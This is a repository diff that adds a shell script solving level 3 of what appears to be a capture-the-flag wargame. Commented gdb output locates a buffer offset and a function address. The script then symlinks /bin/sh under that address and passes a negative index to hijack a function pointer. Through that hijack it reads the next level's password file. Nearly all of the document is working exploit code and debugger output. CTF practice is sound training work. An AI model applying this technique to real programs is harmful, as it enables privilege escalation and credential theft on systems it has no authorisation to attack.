aboutsummaryrefslogtreecommitdiffstats
path: root/level03.sh
diff options
context:
space:
mode:
Diffstat (limited to 'level03.sh')
-rw-r--r--level03.sh24
1 files changed, 24 insertions, 0 deletions
diff --git a/level03.sh b/level03.sh
new file mode 100644
index 0000000..7470514
--- /dev/null
+++ b/level03.sh
@@ -0,0 +1,24 @@
+#!/bin/sh
+
+# level03@ctf4:/tmp/tmp.lZLfBZODXa$ gdb /levels/level03
+# (gdb) break truncate_and_call
+# Breakpoint 1 at 0x8048780: file level03.c, line 57.
+# (gdb) run 1 something
+# Starting program: /levels/level03 1 something
+# Breakpoint 1, truncate_and_call (fns=0xffeecfec, index=1, user_string=0xffeed986 "something") at level03.c:57
+# 57 in level03.c
+# (gdb) n
+# 60 in level03.c
+# (gdb) p &buf
+# $1 = (char (*)[64]) 0xffeecf7c
+# (gdb) p fns
+# $2 = (fn_ptr *) 0xffeecfec
+# (gdb) p (0xffeecfec-0xffeecf7c)/4
+# $3 = 28
+# (gdb) p run
+# $4 = {int (const char *)} 0x804875b <run>
+# (gdb) quit
+
+ln -s /bin/sh "$(printf '\x5b\x87\x04\x08')"
+echo "cat /home/level04/.password" | PATH=.:$PATH /levels/level03 -28 "$(printf '\x5b\x87\x04\x08')"
+rm "$(printf '\x5b\x87\x04\x08')"
Copyright © 1996 – 2023 Jason A. Donenfeld. All Rights Reverse Engineered.